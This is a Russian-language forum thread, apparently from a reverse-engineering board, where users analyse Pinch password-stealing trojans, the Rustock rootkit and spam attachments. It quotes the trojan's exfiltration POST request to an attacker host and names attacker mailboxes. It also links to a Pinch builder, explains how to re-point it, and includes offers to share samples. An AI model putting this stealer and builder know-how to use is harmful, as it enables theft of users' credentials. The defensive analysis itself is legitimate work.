В этом топике происходит исследование малвари: вирусни, троянов, как их вычистить и тд.

| Сообщение посчитали полезным:

Marisha пишет:
У тебя пинч был
Ну вроде пронесло меня......
вовремя его заметил.

-----
AutoIt

| Сообщение посчитали полезным:

Жалко мне такое не приходило... кстати на вебфайле истек срок хранения того экзешника киньте
кто-нить на рапиду плз

-----
Researcher

| Сообщение посчитали полезным:

Spirit_Fenix пишет:
самое интересное, что на маил.ру стоит антивирус, но все равно пропускает
Антивирус мыла г*вно. Юзать надо не антивири, а сандбокс, файрвол и мозги.
Как вообще можно запускать какую-та малопонятную программу от неизвестного адресата? Тайна.

Кстати, а есть какой-нибудь краклабовский фтпшник, например?

-----
Харе курить веники и нюхать клей, к вам едет из Америки бог Шива, и он еврей.

| Сообщение посчитали полезным:

Люди а есть у кого-нить пинч- посмотреть охота

| Сообщение посчитали полезным:

Crawler я-то не запускал.. я знаю, что там лежит обычно) но еще встречаются люди, которые запускают файлы, пришедшие из совершенно неизвестных мест.

Nightshade Одному знакомому прислали Trojan-PSW.Win32.LdPinch.bad, могу переслать, если надо..
Кстати (сразу извиняюсь за тупой вопрос), как бы узнать, на какое мыло отсылает данные, выше указанный троян?

| Сообщение посчитали полезным:

Spirit_Fenix пишет:
на какое мыло отсылает данные, выше указанный троян?

Запусти, узнаеш.

| Сообщение посчитали полезным:

Nightshade пишет:
Люди а есть у кого-нить пинч- посмотреть охота
гугл те в помощь. паблик троев полно
NIKOLA пишет:
Запусти, узнаеш.


| Сообщение посчитали полезным:

2 Nightshade:
На предыдущей странице в третьем посте я цеплял пинча, которым был заражон сам.
Кстате тоже бы хотелось узнать на какое мыло он слал.
ДА и вообще поподробнее о нём...

-----
AutoIt

| Сообщение посчитали полезным:

OLEGator пишет:
Кстате тоже бы хотелось узнать на какое мыло он слал.
А какие собственно проблемы. WMWARE+OLLYDBG+IRIS и все узнаеш, и необязательно он на мыло шлет, может просто HTTP запрос с нужной инфой на сайт делать, а PHP скрипт сам логи ведет.

| Сообщение посчитали полезным:

OLEGator несколько криво распаковалось но вроде на uniqload@topmail.kz : проверять на основной машине нет никакого желания : впринципе пасы то не уйдут но вычещать эту хрень не охото...

| Сообщение посчитали полезным:

Вообщем тот вирь создает файлы ie-hook.txt, hook.txt и pass.bin, тырит что-то с ICQ (именно аськи от Mirabilis), аутглюка, тоталкоммандера, инеткома, осла, какого-то RimArts, CuteFTP, диалапа, Оперы, по-моему какого-то неизвестного мне ftp-сервера(клиента?), Мозиллы, Эудоры, Тундербёрда, МайлРу агента, Миранды, R&Q, &RQ, TheBat, логины от плагина Far hosts, Триллиана, qaim, qip, FileZilla, Mozilla Firefox, Punto Switcher (?!), SmartFTP, Passport.NET, USDownloader,

Детекта ВМ нет.
Отправляет 'POST /reports/gate.php HTTP/1.0',0Dh,0Ah,'Host: %s',0Dh,0Ah,'%s-Type: application/x-www-form-urlencoded',0Dh,0Ah,'%s-Length: %u',0Dh,0Ah,0Dh,0Ah,'a=uniqload@topmail.kz&b=Rep&d=%s&c=',0
Где HOST - bakayar0.info

Есть похоже что-то зашифрованное NXjFJfTiSUXqrxkPQrGiv
Хранился троянчик у автора в H:SPloitcsrss.exe

Блин, хочу конфигуратор!!! (если есть) да и строку расшифровать/перешифровать не лишне, если это хост

-----
ring 0

| Сообщение посчитали полезным:

есть конфигуратор склееный с троем но расклееть трой и поменять этим же конфигуратором мыла вопрос 5 минут ;
dобще это берецо любой скампилиный пинч 2.98 или какой там последний... и меняецо мыло но функционал не прибавляецо от этого : все что было в трое то и остаецо ибо при кампеляции билда те строки были закаментены. называецо та хрень pinch3 от Васьки...
hxxp://www.webfile.ru/1214621 только ахтунг! билдер склеен парсер непроверял.
пароли уходят kat00x@gmail.com через smtp.inbox.ru :\

| Сообщение посчитали полезным:

хех вот еще один "пенч3" проспамили по ойсикю
201763668 (02:26:12 13/01/2007)
Запрос авторизации
Porno s ZHana Friski toka u nas!!!!
Zaydite syuda: hxxp://slil.ru/23734215

отчеты падают на www.sudga.org/agate/gate.php
много всего пытаецо спереть а также обойти касперчега и аутпост через нажатие на кнопке
упакован "прЕватным криптором" бугого 14 секций с произвольными именами... распаковываецо на раз =//

| Сообщение посчитали полезным:

Red Bar0n пишет:
uniqload@topmail.kz

Гы...
казахи взялись за компы!


apple пишет:
Punto Switcher (?!)
А это блин очень меня насторожило!
Так если у пинтосвитчера включена функция дневника, то он является тем же кейлоггером. и дневник паролится.
Хорошо если он тырит тока пароль, а если и сам фаел дневника?
йоп!!!!

2 Red Bar0n:
Так всётаки интересно!
Тот который у меня сидел (csrss.exe) Это и есть всем известный пинч 3 ?
Или это чьято собственная разработка?
неуж казахи научились делать?
Гы...


-----
AutoIt

| Сообщение посчитали полезным:

Удивительно неужели ещё есть люди, запускающие файлы с расширением .exe от неизвесных людей?

Впрочем, читать спам иногда интересно, мне вот прислал письмо SADIQ HASSAN, расказывает, что он дружбан покойного Саддама, и тот завещял забрать со своего счёта 30 лимонов баксов, но вот беда, надо перегнать бабки на другой счёт, что бы их снять. Не помогу ли я доблесным бойцам с американской тиранией за 35%, от меня всего-то надо - номер счёта и
NAME
ADDRESS
TEL/FAX…..MOBILE LINE
OCCUPATION
ORGANISATION
DATE OF BIRTH
COUNTRY
PRIVATE EMAIL ADDRESS

Счастье ! Бегу отправлять реквизиты на мыльник в домене 4-го уровня
sadiq@hassandiq.orangehome.co.uk

PS Обратите внимание на домен - без украины не обошлось )))

| Сообщение посчитали полезным:

Вот умора!!!!!

| Сообщение посчитали полезным:

Шик, я тоже так хочу. Только .uk это не Украина. Украина - .ua

| Сообщение посчитали полезным:

да нет, я про orangehome

| Сообщение посчитали полезным:

OLEGator пишет:

Тот который у меня сидел (csrss.exe) Это и есть всем известный пинч 3 ?
Или это чьято собственная разработка?
неуж казахи научились делать?
это баяный пинч от дамрая так как тянет пароли для qip сталобыть версия старше 2.58 =\ казахи нехрена не научились делать походу только покупают билды и криптуют их =\

| Сообщение посчитали полезным:

(off)
OLEGator пишет:
неуж казахи научились делать?

Гыгы. Я одно время там жил, там не только казахи живут (/off)

Red Bar0n пишет:
hxxp://www.webfile.ru/1214621 только ахтунг! билдер склеен парсер непроверял.
пароли уходят kat00x@gmail.com через smtp.inbox.ru :

А не вломить ли сцуке флудоспамом ?

-----
Харе курить веники и нюхать клей, к вам едет из Америки бог Шива, и он еврей.

| Сообщение посчитали полезным:

Столько шума вокруг пустоты. Другое дело, если бы поймал кто-то какого-то интересного трояна... а так не пойму, что там казахи (или не казахи, не важно) научились делать. ИМХО нифига они не научились. Когда аверы поймали Backdoor.Rustok.B они удивлялись куда больше

>Among Rustock's distinguishing characteristics are its heavy reliance on advanced rootkit technologies to hide from security software and its changeling-like ability to morph itself each time it infects a file.

>Hide itself from applications:

RootkitRevealer
BlackLight
Rkdetector
gmer.exe
endoscope.EXE
DarkSpy
Anti-Rootkit
...
Даже статью написали:
Rustock Trojan A Model For Future Threats http://www.informationweek.com/story/showArticle.jhtml?articleID=196603916&cid=RSSfeed_IWK_News

-----
Research is my purpose

| Сообщение посчитали полезным:

Rustok.B - это v1.2?

Присутствие руткита может быть обнаружено достаточно просто - пробуем создать подветку pe386 в
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services

Кста, автор уже давно обещал С =)

| Сообщение посчитали полезным:

Вот ещё один встретил
UnHackMe ver. 4.0.4.257 | 1.5 MB
www.ftp2share.com/file/15514/um404257_cl.rar.html

| Сообщение посчитали полезным:

Ratinsh пишет:
UnHackMe ver. 4.0.4.257
фигня это а не антируткит

-----
Research is my purpose

| Сообщение посчитали полезным:

Из статьи:
"It's a true polymorphic," Martin says

Гыгы. Кого они хотели этим удивить

[ОФФ]
Freecod пишет:
PS Обратите внимание на домен - без украины не обошлось )))
Гыгы. Только сейчас заметил и ржалпацтулом 3 часа.
[/ОФФ]

Error_Log пишет:
Ratinsh пишет:
UnHackMe ver. 4.0.4.257
фигня это а не антируткит
мдя. Это не руткит, а покет новобранца-извращенца.

-----
Харе курить веники и нюхать клей, к вам едет из Америки бог Шива, и он еврей.

| Сообщение посчитали полезным:

хаха, интересно было прочитать про умных казахов ))). Когда-то давным давно в хелпе к первому пинчу кто-то написал что отчёты от трояна без проблем приходят на topmail.kz, и до сих пор детишки юзают там мыльники, используя этот пример )).

| Сообщение посчитали полезным:

А я наверное опять чёта подцепил...
Сегодня утром из моей ацки какаято сволочь вылазила и клянчала денег у моего другана.

Но благо, я предпологал, что это может случиться и контакт лист храню только локально!
На серваке пусто! И в итоге нарушитель мог обуть только тех, кто сам к нему постучался первым.

Блин....
надо завязывать с рыбалкой...
Столько мусора летит...

з.ы.
только что подсказали что возможно это оно:
hxxp://im.avtoban.com/
типа прога для асикью протокола всякие фичи...

-----
AutoIt

| Сообщение посчитали полезным:

Мне только что пришло пустое (никакого текста внутри) сообщение непонятно от кого.
И какой-то непонятный файл внутри. Не стал его открывать.

ОТ: Mccarthy Anthony <mrrdz@movie.fr>
ТЕМА: Hugging My Pillow
RFC:
Return-path: <mrrdz@movie.fr>
Received: from [75.167.28.57] (port=3636
helo=75-167-28-57.phnx.qwest.net)
by mx31.mail.ru with esmtp
id 1H95Ca-000EW8-00

Народ, посмотрите, что это за вирус. У меня Norton Antivirus молчит...



cbf8_22.01.2007_CRACKLAB.rU.tgz - greeting card.exe

| Сообщение посчитали полезным:

Mavlyudov
ну сть же www.virustotal.com/en/indexx.html :\

вот что выдал плаген к фф (онлайн чек дрвеба)

Размер файла: 46739 байт

cbf8_22.01.2007_CRACKLAB.rU.tgz - archive GZIP
>cbf8_22.01.2007_CRACKLAB.rU.tgz/gziped.gz - archive TAR
В файле >>cbf8_22.01.2007_CRACKLAB.rU.tgz/gziped.gz/greeting card.exe обнаружен вирус Trojan.DownLoader.17767

| Сообщение посчитали полезным:

Mavlyudov
Тут и думать даже не надо =) Вирусня 100%. Так как нахрена ХЗ кому слать открытку в EXE формате и к тому же ничего не написав.

Хотя из 100 человек 10 дебилов запустят ради любопытства

P.S. Многим походу дела прислали Так как и мне тоже приходило (письмо грохнул даже не задумываясь).

-----
Computer Security Laboratory

| Сообщение посчитали полезным: